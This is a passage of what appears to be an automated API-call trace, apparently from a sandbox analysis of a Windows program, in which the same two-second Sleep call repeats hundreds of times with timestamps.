Sleep (dwMilliseconds=0x7d0) [0212.237] Sleep (dwMilliseconds=0x7d0) [0212.243] Sleep (dwMilliseconds=0x7d0) [0212.244] Sleep (dwMilliseconds=0x7d0) [0212.250] Sleep (dwMilliseconds=0x7d0) [0212.251] Sleep (dwMilliseconds=0x7d0) [0212.257] Sleep (dwMilliseconds=0x7d0) [0212.259] Sleep (dwMilliseconds=0x7d0) [0212.267] Sleep (dwMilliseconds=0x7d0) [0212.270] Sleep (dwMilliseconds=0x7d0) [0212.275] Sleep (dwMilliseconds=0x7d0) [0212.281] Sleep (dwMilliseconds=0x7d0) [0212.283] Sleep (dwMilliseconds=0x7d0) [0212.288] Sleep (dwMilliseconds=0x7d0) [0212.295] Sleep (dwMilliseconds=0x7d0) [0212.297] Sleep (dwMilliseconds=0x7d0) [0212.304] Sleep (dwMilliseconds=0x7d0) [0212.312] Sleep (dwMilliseconds=0x7d0) [0212.320] Sleep (dwMilliseconds=0x7d0) [0212.322] Sleep (dwMilliseconds=0x7d0) [0212.330] Sleep (dwMilliseconds=0x7d0) [0212.342] Sleep (dwMilliseconds=0x7d0) [0212.344] Sleep (dwMilliseconds=0x7d0) [0212.351] Sleep (dwMilliseconds=0x7d0) [0212.394] Sleep (dwMilliseconds=0x7d0) [0212.397] Sleep (dwMilliseconds=0x7d0) [0212.401] Sleep (dwMilliseconds=0x7d0) [0212.403] Sleep (dwMilliseconds=0x7d0) [0212.414] Sleep (dwMilliseconds=0x7d0) [0212.420] Sleep (dwMilliseconds=0x7d0) [0212.421] Sleep (dwMilliseconds=0x7d0) [0212.429] Sleep (dwMilliseconds=0x7d0) [0212.436] Sleep (dwMilliseconds=0x7d0) [0212.437] Sleep (dwMilliseconds=0x7d0) [0212.443] Sleep (dwMilliseconds=0x7d0) [0212.446] Sleep (dwMilliseconds=0x7d0) [0212.449] Sleep (dwMilliseconds=0x7d0) [0212.451] Sleep (dwMilliseconds=0x7d0) [0212.456] Sleep (dwMilliseconds=0x7d0) [0212.457] Sleep (dwMilliseconds=0x7d0) [0212.462] Sleep (dwMilliseconds=0x7d0) [0212.468] Sleep (dwMilliseconds=0x7d0) [0212.470] Sleep (dwMilliseconds=0x7d0) [0212.475] Sleep (dwMilliseconds=0x7d0) [0212.476] Sleep (dwMilliseconds=0x7d0) [0212.482] Sleep (dwMilliseconds=0x7d0) [0212.490] Sleep (dwMilliseconds=0x7d0) [0212.496] Sleep (dwMilliseconds=0x7d0) [0212.498] Sleep (dwMilliseconds=0x7d0) [0212.504] Sleep (dwMilliseconds=0x7d0) [0212.505] Sleep (dwMilliseconds=0x7d0) [0212.511] Sleep (dwMilliseconds=0x7d0) [0212.512] Sleep (dwMilliseconds=0x7d0) [0212.518] Sleep (dwMilliseconds=0x7d0) [0212.519] Sleep (dwMilliseconds=0x7d0) [0212.525] Sleep (dwMilliseconds=0x7d0) [0212.532] Sleep (dwMilliseconds=0x7d0) [0212.535] Sleep (dwMilliseconds=0x7d0) [0212.538] Sleep (dwMilliseconds=0x7d0) [0212.539] Sleep (dwMilliseconds=0x7d0) [0212.545] Sleep (dwMilliseconds=0x7d0) [0212.551] Sleep (dwMilliseconds=0x7d0) [0212.552] Sleep (dwMilliseconds=0x7d0) [0212.558] Sleep (dwMilliseconds=0x7d0) [0212.560] Sleep (dwMilliseconds=0x7d0) [0212.565] Sleep (dwMilliseconds=0x7d0) [0212.572] Sleep (dwMilliseconds=0x7d0) [0212.573] Sleep (dwMilliseconds=0x7d0) [0212.579] Sleep (dwMilliseconds=0x7d0) [0212.586] Sleep (dwMilliseconds=0x7d0) [0212.587] Sleep (dwMilliseconds=0x7d0) [0212.592] Sleep (dwMilliseconds=0x7d0) [0212.594] Sleep (dwMilliseconds=0x7d0) [0212.601] Sleep (dwMilliseconds=0x7d0) [0212.602] Sleep (dwMilliseconds=0x7d0) [0212.608] Sleep (dwMilliseconds=0x7d0) [0212.617] Sleep (dwMilliseconds=0x7d0) [0212.618] Sleep (dwMilliseconds=0x7d0) [0212.624] Sleep (dwMilliseconds=0x7d0) [0212.626] Sleep (dwMilliseconds=0x7d0) [0212.628] Sleep (dwMilliseconds=0x7d0) [0212.632] Sleep (dwMilliseconds=0x7d0) [0212.634] Sleep (dwMilliseconds=0x7d0) [0212.639] Sleep (dwMilliseconds=0x7d0) [0212.641] Sleep (dwMilliseconds=0x7d0) [0212.647] Sleep (dwMilliseconds=0x7d0) [0212.654] Sleep (dwMilliseconds=0x7d0) [0212.660] Sleep (dwMilliseconds=0x7d0) [0212.667] Sleep (dwMilliseconds=0x7d0) [0212.668] Sleep (dwMilliseconds=0x7d0) [0212.671] Sleep (dwMilliseconds=0x7d0) [0212.675] Sleep (dwMilliseconds=0x7d0) [0212.676] Sleep (dwMilliseconds=0x7d0) [0212.684] Sleep (dwMilliseconds=0x7d0) [0212.685] Sleep (dwMilliseconds=0x7d0) [0212.693] Sleep (dwMilliseconds=0x7d0) [0212.695] Sleep (dwMilliseconds=0x7d0) [0212.702] Sleep (dwMilliseconds=0x7d0) [0212.703] Sleep (dwMilliseconds=0x7d0) [0212.711] Sleep (dwMilliseconds=0x7d0) [0212.715] Sleep (dwMilliseconds=0x7d0) [0212.720] Sleep (dwMilliseconds=0x7d0) [0212.722] Sleep (dwMilliseconds=0x7d0) [0212.732] Sleep (dwMilliseconds=0x7d0) [0212.740] Sleep (dwMilliseconds=0x7d0) [0212.741] Sleep (dwMilliseconds=0x7d0) [0212.749] Sleep (dwMilliseconds=0x7d0) [0212.758] Sleep (dwMilliseconds=0x7d0) [0212.759] Sleep (dwMilliseconds=0x7d0) [0212.766] Sleep (dwMilliseconds=0x7d0) [0212.768] Sleep (dwMilliseconds=0x7d0) [0212.775] Sleep (dwMilliseconds=0x7d0) [0212.783] Sleep (dwMilliseconds=0x7d0) [0212.784] Sleep (dwMilliseconds=0x7d0) [0212.792] Sleep (dwMilliseconds=0x7d0) [0212.801] Sleep (dwMilliseconds=0x7d0) [0212.803] Sleep (dwMilliseconds=0x7d0) [0212.810] Sleep (dwMilliseconds=0x7d0) [0212.812] Sleep (dwMilliseconds=0x7d0) [0212.820] Sleep (dwMilliseconds=0x7d0) [0212.822] Sleep (dwMilliseconds=0x7d0) [0212.829] Sleep (dwMilliseconds=0x7d0) [0212.832] Sleep (dwMilliseconds=0x7d0) [0212.840] Sleep (dwMilliseconds=0x7d0) [0212.847] Sleep (dwMilliseconds=0x7d0) [0212.849] Sleep (dwMilliseconds=0x7d0) [0212.851] Sleep (dwMilliseconds=0x7d0) [0212.858] Sleep (dwMilliseconds=0x7d0) [0212.866] Sleep (dwMilliseconds=0x7d0) [0212.868] Sleep (dwMilliseconds=0x7d0) [0212.875] Sleep (dwMilliseconds=0x7d0) [0212.876] Sleep (dwMilliseconds=0x7d0) [0212.913] Sleep (dwMilliseconds=0x7d0) [0212.914] Sleep (dwMilliseconds=0x7d0) [0212.920] Sleep (dwMilliseconds=0x7d0) [0212.923] Sleep (dwMilliseconds=0x7d0) [0212.925] Sleep (dwMilliseconds=0x7d0) [0212.934] Sleep (dwMilliseconds=0x7d0) [0212.943] Sleep (dwMilliseconds=0x7d0) [0212.951] Sleep (dwMilliseconds=0x7d0) [0212.953] Sleep (dwMilliseconds=0x7d0) [0212.960] Sleep (dwMilliseconds=0x7d0) [0212.962] Sleep (dwMilliseconds=0x7d0) [0212.965] Sleep (dwMilliseconds=0x7d0) [0212.970] Sleep (dwMilliseconds=0x7d0) [0212.977] Sleep (dwMilliseconds=0x7d0) [0212.978] Sleep (dwMilliseconds=0x7d0) [0212.984] Sleep (dwMilliseconds=0x7d0) [0212.985] Sleep (dwMilliseconds=0x7d0) [0212.991] Sleep (dwMilliseconds=0x7d0) [0212.993] Sleep (dwMilliseconds=0x7d0) [0213.034] Sleep (dwMilliseconds=0x7d0) [0213.041] Sleep (dwMilliseconds=0x7d0) [0213.044] Sleep (dwMilliseconds=0x7d0) [0213.048] Sleep (dwMilliseconds=0x7d0) [0213.055] Sleep (dwMilliseconds=0x7d0) [0213.057] Sleep (dwMilliseconds=0x7d0) [0213.063] Sleep (dwMilliseconds=0x7d0) [0213.065] Sleep (dwMilliseconds=0x7d0) [0213.071] Sleep (dwMilliseconds=0x7d0) [0213.078] Sleep (dwMilliseconds=0x7d0) [0213.079] Sleep (dwMilliseconds=0x7d0) [0213.085] Sleep (dwMilliseconds=0x7d0) [0213.087] Sleep (dwMilliseconds=0x7d0) [0213.093] Sleep (dwMilliseconds=0x7d0) [0213.099] Sleep (dwMilliseconds=0x7d0) [0213.101] Sleep (dwMilliseconds=0x7d0) [0213.106] Sleep (dwMilliseconds=0x7d0) [0213.108] Sleep (dwMilliseconds=0x7d0) [0213.115] Sleep (dwMilliseconds=0x7d0) [0213.117] Sleep (dwMilliseconds=0x7d0) [0213.135] Sleep (dwMilliseconds=0x7d0) [0213.142] Sleep (dwMilliseconds=0x7d0) [0213.144] Sleep (dwMilliseconds=0x7d0) [0213.154] Sleep (dwMilliseconds=0x7d0) [0213.164] Sleep (dwMilliseconds=0x7d0) [0213.165] Sleep (dwMilliseconds=0x7d0) [0213.174] Sleep (dwMilliseconds=0x7d0) [0213.176] Sleep (dwMilliseconds=0x7d0) [0213.183] Sleep (dwMilliseconds=0x7d0) [0213.184] Sleep (dwMilliseconds=0x7d0) [0213.188] Sleep (dwMilliseconds=0x7d0) [0213.193] Sleep (dwMilliseconds=0x7d0) [0213.201] Sleep (dwMilliseconds=0x7d0) [0213.208] Sleep (dwMilliseconds=0x7d0) [0213.209] Sleep (dwMilliseconds=0x7d0) [0213.215] Sleep (dwMilliseconds=0x7d0) [0213.222] Sleep (dwMilliseconds=0x7d0) [0213.224] Sleep (dwMilliseconds=0x7d0) [0213.230] Sleep (dwMilliseconds=0x7d0) [0213.231] Sleep (dwMilliseconds=0x7d0) [0213.233] Sleep (dwMilliseconds=0x7d0) [0213.238] Sleep (dwMilliseconds=0x7d0) [0213.246] Sleep (dwMilliseconds=0x7d0) [0213.247] Sleep (dwMilliseconds=0x7d0) [0213.253] Sleep (dwMilliseconds=0x7d0) [0213.261] Sleep (dwMilliseconds=0x7d0) [0213.262] Sleep (dwMilliseconds=0x7d0) [0213.269] Sleep (dwMilliseconds=0x7d0) [0213.270] Sleep (dwMilliseconds=0x7d0) [0213.276] Sleep (dwMilliseconds=0x7d0) [0213.277] Sleep (dwMilliseconds=0x7d0) [0213.284] Sleep (dwMilliseconds=0x7d0) [0213.285] Sleep (dwMilliseconds=0x7d0) [0213.291] Sleep (dwMilliseconds=0x7d0) [0213.293] Sleep (dwMilliseconds=0x7d0) [0213.299] Sleep (dwMilliseconds=0x7d0) [0213.356] Sleep (dwMilliseconds=0x7d0) [0213.367] Sleep (dwMilliseconds=0x7d0) [0213.373] Sleep (dwMilliseconds=0x7d0) [0213.374] Sleep (dwMilliseconds=0x7d0) [0213.380] Sleep (dwMilliseconds=0x7d0) [0213.382] Sleep (dwMilliseconds=0x7d0) [0213.390] Sleep (dwMilliseconds=0x7d0) [0213.391] Sleep (dwMilliseconds=0x7d0) [0213.398] Sleep (dwMilliseconds=0x7d0) [0213.399] Sleep (dwMilliseconds=0x7d0) [0213.402] Sleep (dwMilliseconds=0x7d0) [0213.406] Sleep (dwMilliseconds=0x7d0) [0213.413] Sleep (dwMilliseconds=0x7d0) [0213.414] Sleep (dwMilliseconds=0x7d0) [0213.421] Sleep (dwMilliseconds=0x7d0) [0213.429] Sleep (dwMilliseconds=0x7d0) [0213.431] Sleep (dwMilliseconds=0x7d0) [0213.438] Sleep (dwMilliseconds=0x7d0) [0213.439] Sleep (dwMilliseconds=0x7d0) [0213.446] Sleep (dwMilliseconds=0x7d0) [0213.448] Sleep (dwMilliseconds=0x7d0) [0213.456] Sleep (dwMilliseconds=0x7d0) [0213.457] Sleep (dwMilliseconds=0x7d0) [0213.464] Sleep (dwMilliseconds=0x7d0) [0213.466] Sleep (dwMilliseconds=0x7d0) [0213.473] Sleep (dwMilliseconds=0x7d0) [0213.482] Sleep (dwMilliseconds=0x7d0) [0213.484] Sleep (dwMilliseconds=0x7d0) [0213.491] Sleep (dwMilliseconds=0x7d0) [0213.492] Sleep (dwMilliseconds=0x7d0) [0213.501] Sleep (dwMilliseconds=0x7d0) [0213.509] Sleep (dwMilliseconds=0x7d0) [0213.511] Sleep (dwMilliseconds=0x7d0) [0213.520] Sleep (dwMilliseconds=0x7d0) [0213.528] Sleep (dwMilliseconds=0x7d0) [0213.530] Sleep (dwMilliseconds=0x7d0) [0213.536] Sleep (dwMilliseconds=0x7d0) [0213.539] Sleep (dwMilliseconds=0x7d0) [0213.548] Sleep (dwMilliseconds=0x7d0) [0213.557] Sleep (dwMilliseconds=0x7d0) [0213.565] Sleep (dwMilliseconds=0x7d0) [0213.573] Sleep (dwMilliseconds=0x7d0) [0213.575] Sleep (dwMilliseconds=0x7d0) [0213.578] Sleep (dwMilliseconds=0x7d0) [0213.583] Sleep (dwMilliseconds=0x7d0) [0213.584] Sleep (dwMilliseconds=0x7d0) [0213.592] Sleep (dwMilliseconds=0x7d0) [0213.593] Sleep (dwMilliseconds=0x7d0) [0213.601] Sleep (dwMilliseconds=0x7d0) [0213.603] Sleep (dwMilliseconds=0x7d0) [0213.611] Sleep (dwMilliseconds=0x7d0) [0213.619] Sleep (dwMilliseconds=0x7d0) [0213.620] Sleep (dwMilliseconds=0x7d0) [0213.622] Sleep (dwMilliseconds=0x7d0) [0213.629] Sleep (dwMilliseconds=0x7d0) [0213.630] Sleep (dwMilliseconds=0x7d0) [0213.638] Sleep (dwMilliseconds=0x7d0) [0213.639] Sleep (dwMilliseconds=0x7d0) [0213.648] Sleep (dwMilliseconds=0x7d0) [0213.649] Sleep (dwMilliseconds=0x7d0) [0213.658] Sleep (dwMilliseconds=0x7d0) [0213.668] Sleep (dwMilliseconds=0x7d0) [0213.669] Sleep (dwMilliseconds=0x7d0) [0213.678] Sleep (dwMilliseconds=0x7d0) [0213.679] Sleep (dwMilliseconds=0x7d0) [0213.687] Sleep (dwMilliseconds=0x7d0) [0213.688] Sleep (dwMilliseconds=0x7d0) [0213.696] Sleep (dwMilliseconds=0x7d0) [0213.705] Sleep (dwMilliseconds=0x7d0) [0213.706] Sleep (dwMilliseconds=0x7d0) [0213.713] Sleep (dwMilliseconds=0x7d0) [0213.715] Sleep (dwMilliseconds=0x7d0) [0213.723] Sleep (dwMilliseconds=0x7d0) [0213.732] Sleep (dwMilliseconds=0x7d0) [0213.740] Sleep (dwMilliseconds=0x7d0) [0213.741] Sleep (dwMilliseconds=0x7d0) [0213.748] Sleep (dwMilliseconds=0x7d0) [0213.750] Sleep (dwMilliseconds=0x7d0) [0213.760] Sleep (dwMilliseconds=0x7d0) [0213.764] Sleep (dwMilliseconds=0x7d0) [0213.765] Sleep (dwMilliseconds=0x7d0) [0213.773] Sleep (dwMilliseconds=0x7d0) [0213.774] Sleep (dwMilliseconds=0x7d0) [0213.781] Sleep (dwMilliseconds=0x7d0) [0213.783] Sleep (dwMilliseconds=0x7d0) [0213.790] Sleep (dwMilliseconds=0x7d0) [0213.798] Sleep (dwMilliseconds=0x7d0) [0213.799] Sleep (dwMilliseconds=0x7d0) [0213.805] Sleep (dwMilliseconds=0x7d0) [0213.808] Sleep (dwMilliseconds=0x7d0) [0213.816] Sleep (dwMilliseconds=0x7d0) [0213.818] Sleep (dwMilliseconds=0x7d0) [0213.825] Sleep (dwMilliseconds=0x7d0) [0213.826] Sleep (dwMilliseconds=0x7d0) [0213.833] Sleep (dwMilliseconds=0x7d0) [0213.835] Sleep (dwMilliseconds=0x7d0) [0213.844] Sleep (dwMilliseconds=0x7d0) [0213.846] Sleep (dwMilliseconds=0x7d0) [0213.906] Sleep (dwMilliseconds=0x7d0) [0213.909] Sleep (dwMilliseconds=0x7d0) [0213.915] Sleep (dwMilliseconds=0x7d0) [0213.917] Sleep (dwMilliseconds=0x7d0) [0213.922] Sleep (dwMilliseconds=0x7d0) [0213.923] Sleep (dwMilliseconds=0x7d0) [0213.928] Sleep (dwMilliseconds=0x7d0) [0213.934] Sleep (dwMilliseconds=0x7d0) [0213.935] Sleep (dwMilliseconds=0x7d0) [0213.940] Sleep (dwMilliseconds=0x7d0) [0213.941] Sleep (dwMilliseconds=0x7d0) [0213.946] Sleep (dwMilliseconds=0x7d0) [0213.948] Sleep (dwMilliseconds=0x7d0) [0213.952] Sleep (dwMilliseconds=0x7d0) [0213.954] Sleep (dwMilliseconds=0x7d0) [0213.959] Sleep (dwMilliseconds=0x7d0) [0213.961] Sleep (dwMilliseconds=0x7d0) [0213.967] Sleep (dwMilliseconds=0x7d0) [0213.972] Sleep (dwMilliseconds=0x7d0) [0213.975] Sleep (dwMilliseconds=0x7d0) [0213.980] Sleep (dwMilliseconds=0x7d0) [0213.981] Sleep (dwMilliseconds=0x7d0) [0213.986] Sleep (dwMilliseconds=0x7d0) [0213.988] Sleep (dwMilliseconds=0x7d0) [0213.992] Sleep (dwMilliseconds=0x7d0) [0213.994] Sleep (dwMilliseconds=0x7d0) [0213.999] Sleep (dwMilliseconds=0x7d0) [0214.005] Sleep (dwMilliseconds=0x7d0) [0214.006] Sleep (dwMilliseconds=0x7d0) [0214.011] Sleep (dwMilliseconds=0x7d0) [0214.012] Sleep (dwMilliseconds=0x7d0) [0214.017] Sleep (dwMilliseconds=0x7d0) [0214.019] Sleep (dwMilliseconds=0x7d0) [0214.024] Sleep (dwMilliseconds=0x7d0) [0214.025] Sleep (dwMilliseconds=0x7d0) [0214.118] Sleep (dwMilliseconds=0x7d0) [0214.130] Sleep (dwMilliseconds=0x7d0) [0214.138] Sleep (dwMilliseconds=0x7d0) [0214.141] Sleep (dwMilliseconds=0x7d0) [0214.148] Sleep (dwMilliseconds=0x7d0) [0214.156] Sleep (dwMilliseconds=0x7d0) [0214.158] Sleep (dwMilliseconds=0x7d0) [0214.166] Sleep (dwMilliseconds=0x7d0) [0214.175] Sleep (dwMilliseconds=0x7d0) [0214.176] Sleep (dwMilliseconds=0x7d0) [0214.184] Sleep (dwMilliseconds=0x7d0) [0214.280] Sleep (dwMilliseconds=0x7d0) [0214.289] Sleep (dwMilliseconds=0x7d0) [0214.295] Sleep (dwMilliseconds=0x7d0) [0214.296] Sleep (dwMilliseconds=0x7d0) [0214.302] Sleep (dwMilliseconds=0x7d0) [0214.310] Sleep (dwMilliseconds=0x7d0) [0214.311] Sleep (dwMilliseconds=0x7d0) [0214.319] Sleep (dwMilliseconds=0x7d0) [0214.324] Sleep (dwMilliseconds=0x7d0) [0214.327] Sleep (dwMilliseconds=0x7d0) [0214.328] Sleep (dwMilliseconds=0x7d0) [0214.334] Sleep (dwMilliseconds=0x7d0) [0214.335] Sleep (dwMilliseconds=0x7d0) [0214.341] Sleep (dwMilliseconds=0x7d0) [0214.343] Sleep (dwMilliseconds=0x7d0) [0214.349] Sleep (dwMilliseconds=0x7d0) [0214.355] Sleep (dwMilliseconds=0x7d0) [0214.362] Sleep (dwMilliseconds=0x7d0) [0214.363] Sleep (dwMilliseconds=0x7d0) [0214.369] Sleep (dwMilliseconds=0x7d0) [0214.370] Sleep (dwMilliseconds=0x7d0) [0214.377] Sleep (dwMilliseconds=0x7d0) [0214.384] Sleep (dwMilliseconds=0x7d0) [0214.391] Sleep (dwMilliseconds=0x7d0) [0214.400] Sleep (dwMilliseconds=0x7d0) [0214.402] Sleep (dwMilliseconds=0x7d0) [0214.410] Sleep (dwMilliseconds=0x7d0) [0214.413] Sleep (dwMilliseconds=0x7d0) [0214.418] Sleep (dwMilliseconds=0x7d0) [0214.420] Sleep (dwMilliseconds=0x7d0) [0214.429] Sleep (dwMilliseconds=0x7d0) [0214.439] Sleep (dwMilliseconds=0x7d0) [0214.441] Sleep (dwMilliseconds=0x7d0) [0214.448] Sleep (dwMilliseconds=0x7d0) [0214.457] Sleep (dwMilliseconds=0x7d0) [0214.459] Sleep (dwMilliseconds=0x7d0) [0214.469] Sleep (dwMilliseconds=0x7d0) [0214.479] Sleep (dwMilliseconds=0x7d0) [0214.487] Sleep (dwMilliseconds=0x7d0) [0214.497] Sleep (dwMilliseconds=0x7d0) [0214.499] Sleep (dwMilliseconds=0x7d0) [0214.503] Sleep (dwMilliseconds=0x7d0) [0214.507] Sleep (dwMilliseconds=0x7d0) [0214.509] Sleep (dwMilliseconds=0x7d0) [0214.519] Sleep (dwMilliseconds=0x7d0) [0214.528] Sleep (dwMilliseconds=0x7d0) [0214.537] Sleep (dwMilliseconds=0x7d0) [0214.545] Sleep (dwMilliseconds=0x7d0) [0214.547] Sleep (dwMilliseconds=0x7d0) [0214.555] Sleep (dwMilliseconds=0x7d0) [0214.564] Sleep (dwMilliseconds=0x7d0) [0214.571] Sleep (dwMilliseconds=0x7d0) [0214.572] Sleep (dwMilliseconds=0x7d0) [0214.579] Sleep (dwMilliseconds=0x7d0) [0214.585] Sleep (dwMilliseconds=0x7d0) [0214.589] Sleep (dwMilliseconds=0x7d0) [0214.591] Sleep (dwMilliseconds=0x7d0) [0214.592] Sleep (dwMilliseconds=0x7d0) [0214.597] Sleep (dwMilliseconds=0x7d0) [0214.599] Sleep (dwMilliseconds=0x7d0) [0214.684] Sleep (dwMilliseconds=0x7d0) [0214.695] Sleep (dwMilliseconds=0x7d0) [0214.702] Sleep (dwMilliseconds=0x7d0) [0214.703] Sleep (dwMilliseconds=0x7d0) [0214.711] Sleep (dwMilliseconds=0x7d0) [0214.712] Sleep (dwMilliseconds=0x7d0) [0214.719] Sleep (dwMilliseconds=0x7d0) [0214.720] Sleep (dwMilliseconds=0x7d0) [0214.728] Sleep (dwMilliseconds=0x7d0) [0214.730] Sleep (dwMilliseconds=0x7d0) [0214.735] Sleep (dwMilliseconds=0x7d0) [0214.736] Sleep (dwMilliseconds=0x7d0) [0214.743] Sleep (dwMilliseconds=0x7d0) [0214.744] Sleep (dwMilliseconds=0x7d0) [0214.750] Sleep (dwMilliseconds=0x7d0) [0214.757] Sleep (dwMilliseconds=0x7d0) [0214.758] Sleep (dwMilliseconds=0x7d0) [0214.764] Sleep (dwMilliseconds=0x7d0) [0214.771] Sleep (dwMilliseconds=0x7d0) [0214.782] Sleep (dwMilliseconds=0x7d0) [0214.783] Sleep (dwMilliseconds=0x7d0) [0214.788] Sleep (dwMilliseconds=0x7d0) [0214.794] Sleep (dwMilliseconds=0x7d0) [0214.795] Sleep (dwMilliseconds=0x7d0) [0214.801] Sleep (dwMilliseconds=0x7d0) [0214.802] Sleep (dwMilliseconds=0x7d0) [0214.808] Sleep (dwMilliseconds=0x7d0) [0214.814] Sleep (dwMilliseconds=0x7d0) [0214.815] Sleep (dwMilliseconds=0x7d0) [0214.821] Sleep (dwMilliseconds=0x7d0) [0214.822] Sleep (dwMilliseconds=0x7d0) [0214.828] Sleep (dwMilliseconds=0x7d0) [0214.829] Sleep (dwMilliseconds=0x7d0) [0214.831] Sleep (dwMilliseconds=0x7d0) [0214.837] Sleep (dwMilliseconds=0x7d0) [0214.838] Sleep (dwMilliseconds=0x7d0) [0214.845] Sleep (dwMilliseconds=0x7d0) [0214.854] Sleep (dwMilliseconds=0x7d0) [0214.864] Sleep (dwMilliseconds=0x7d0) [0214.866] Sleep (dwMilliseconds=0x7d0) [0214.872] Sleep (dwMilliseconds=0x7d0) [0214.874] Sleep (dwMilliseconds=0x7d0) [0214.875] Sleep (dwMilliseconds=0x7d0) [0214.885] Sleep (dwMilliseconds=0x7d0) [0214.886] Sleep (dwMilliseconds=0x7d0) [0214.894] Sleep (dwMilliseconds=0x7d0) [0214.903] Sleep (dwMilliseconds=0x7d0) [0214.912] Sleep (dwMilliseconds=0x7d0) [0214.914] Sleep (dwMilliseconds=0x7d0) [0214.916] Sleep (dwMilliseconds=0x7d0) [0214.922] Sleep (dwMilliseconds=0x7d0) [0214.931] Sleep (dwMilliseconds=0x7d0) [0214.940] Sleep (dwMilliseconds=0x7d0) [0214.949] Sleep (dwMilliseconds=0x7d0) [0214.951] Sleep (dwMilliseconds=0x7d0) [0214.957] Sleep (dwMilliseconds=0x7d0) [0214.959] Sleep (dwMilliseconds=0x7d0) [0214.969] Sleep (dwMilliseconds=0x7d0) [0214.970] Sleep (dwMilliseconds=0x7d0) [0214.979] Sleep (dwMilliseconds=0x7d0) [0214.988] Sleep (dwMilliseconds=0x7d0) [0214.997] Sleep (dwMilliseconds=0x7d0) [0214.998] Sleep (dwMilliseconds=0x7d0) [0215.000] Sleep (dwMilliseconds=0x7d0) [0215.005] Sleep (dwMilliseconds=0x7d0) [0215.012] Sleep (dwMilliseconds=0x7d0) [0215.013] Sleep (dwMilliseconds=0x7d0) [0215.019] Sleep (dwMilliseconds=0x7d0) [0215.022] Sleep (dwMilliseconds=0x7d0) [0215.028] Sleep (dwMilliseconds=0x7d0) [0215.029] Sleep (dwMilliseconds=0x7d0) [0215.036] Sleep (dwMilliseconds=0x7d0) [0215.037] Sleep (dwMilliseconds=0x7d0) [0215.349] Sleep (dwMilliseconds=0x7d0) [0215.369] Sleep (dwMilliseconds=0x7d0) [0215.377] Sleep (dwMilliseconds=0x7d0) [0215.379] Sleep (dwMilliseconds=0x7d0) [0215.388] Sleep (dwMilliseconds=0x7d0) [0215.398] Sleep (dwMilliseconds=0x7d0) [0215.400] Sleep (dwMilliseconds=0x7d0) [0215.405] Sleep (dwMilliseconds=0x7d0) [0215.410] Sleep (dwMilliseconds=0x7d0) [0215.411] Sleep (dwMilliseconds=0x7d0) [0215.419] Sleep (dwMilliseconds=0x7d0) [0215.421] Sleep (dwMilliseconds=0x7d0) [0215.429] Sleep (dwMilliseconds=0x7d0) [0215.430] Sleep (dwMilliseconds=0x7d0) [0215.440] Sleep (dwMilliseconds=0x7d0) [0215.442] Sleep (dwMilliseconds=0x7d0) [0215.452] Sleep (dwMilliseconds=0x7d0) [0215.461] Sleep (dwMilliseconds=0x7d0) [0215.569] Sleep (dwMilliseconds=0x7d0) [0215.575] Sleep (dwMilliseconds=0x7d0) [0215.578] Sleep (dwMilliseconds=0x7d0) [0215.585] Sleep (dwMilliseconds=0x7d0) [0215.586] Sleep (dwMilliseconds=0x7d0) [0215.592] Sleep (dwMilliseconds=0x7d0) [0215.594] Sleep (dwMilliseconds=0x7d0) [0215.600] Sleep (dwMilliseconds=0x7d0) [0215.601] Sleep (dwMilliseconds=0x7d0) [0215.608] Sleep (dwMilliseconds=0x7d0) [0215.609] Sleep (dwMilliseconds=0x7d0) [0215.615] Sleep (dwMilliseconds=0x7d0) [0215.616] Sleep (dwMilliseconds=0x7d0) [0215.620] Sleep (dwMilliseconds=0x7d0) [0215.622] Sleep (dwMilliseconds=0x7d0) [0215.624] Sleep (dwMilliseconds=0x7d0) [0215.631] Sleep (dwMilliseconds=0x7d0) [0215.636] Sleep (dwMilliseconds=0x7d0) [0215.638] Sleep (dwMilliseconds=0x7d0) [0215.643] Sleep (dwMilliseconds=0x7d0) [0215.645] Sleep (dwMilliseconds=0x7d0) [0215.651] Sleep (dwMilliseconds=0x7d0) [0215.657] Sleep (dwMilliseconds=0x7d0) [0215.659] Sleep (dwMilliseconds=0x7d0) [0215.664] Sleep (dwMilliseconds=0x7d0) [0215.666] Sleep (dwMilliseconds=0x7d0) [0215.673] Sleep (dwMilliseconds=0x7d0) [0215.679] Sleep (dwMilliseconds=0x7d0) [0215.681] Sleep (dwMilliseconds=0x7d0) [0215.687] Sleep (dwMilliseconds=0x7d0) [0215.693] Sleep (dwMilliseconds=0x7d0) [0215.700] Sleep (dwMilliseconds=0x7d0) [0215.701] Sleep (dwMilliseconds=0x7d0) [0215.706] Sleep (dwMilliseconds=0x7d0) [0215.707] Sleep (dwMilliseconds=0x7d0) [0215.709] Sleep (dwMilliseconds=0x7d0) [0215.713] Sleep (dwMilliseconds=0x7d0) [0215.715] Sleep (dwMilliseconds=0x7d0) [0215.720] Sleep (dwMilliseconds=0x7d0) [0215.727] Sleep (dwMilliseconds=0x7d0) [0215.736] Sleep (dwMilliseconds=0x7d0) [0215.737] Sleep (dwMilliseconds=0x7d0) [0215.747] Sleep (dwMilliseconds=0x7d0) [0215.752] Sleep (dwMilliseconds=0x7d0) [0215.756] Sleep (dwMilliseconds=0x7d0) [0215.757] Sleep (dwMilliseconds=0x7d0) [0215.767] Sleep (dwMilliseconds=0x7d0) [0215.775] Sleep (dwMilliseconds=0x7d0) [0215.785] Sleep (dwMilliseconds=0x7d0) [0215.794] Sleep (dwMilliseconds=0x7d0) [0215.796] Sleep (dwMilliseconds=0x7d0) [0215.804] Sleep (dwMilliseconds=0x7d0) [0215.813] Sleep (dwMilliseconds=0x7d0) [0215.814] Sleep (dwMilliseconds=0x7d0) [0215.822] Sleep (dwMilliseconds=0x7d0) [0215.831] Sleep (dwMilliseconds=0x7d0) [0215.839] Sleep (dwMilliseconds=0x7d0) [0215.840] Sleep (dwMilliseconds=0x7d0) [0215.848] Sleep (dwMilliseconds=0x7d0) [0215.849] Sleep (dwMilliseconds=0x7d0) [0215.857] Sleep (dwMilliseconds=0x7d0) [0215.858] Sleep (dwMilliseconds=0x7d0) [0215.864] Sleep (dwMilliseconds=0x7d0) [0215.866] Sleep (dwMilliseconds=0x7d0) [0215.872] Sleep (dwMilliseconds=0x7d0) [0215.893] Sleep (dwMilliseconds=0x7d0) [0215.896] Sleep (dwMilliseconds=0x7d0) [0215.899] Sleep (dwMilliseconds=0x7d0) [0215.901] Sleep (dwMilliseconds=0x7d0) [0215.907] Sleep (dwMilliseconds=0x7d0) [0215.908] Sleep (dwMilliseconds=0x7d0) [0215.916] Sleep (dwMilliseconds=0x7d0) [0215.918] Sleep (dwMilliseconds=0x7d0) [0215.923] Sleep (dwMilliseconds=0x7d0) [0215.925] Sleep (dwMilliseconds=0x7d0) 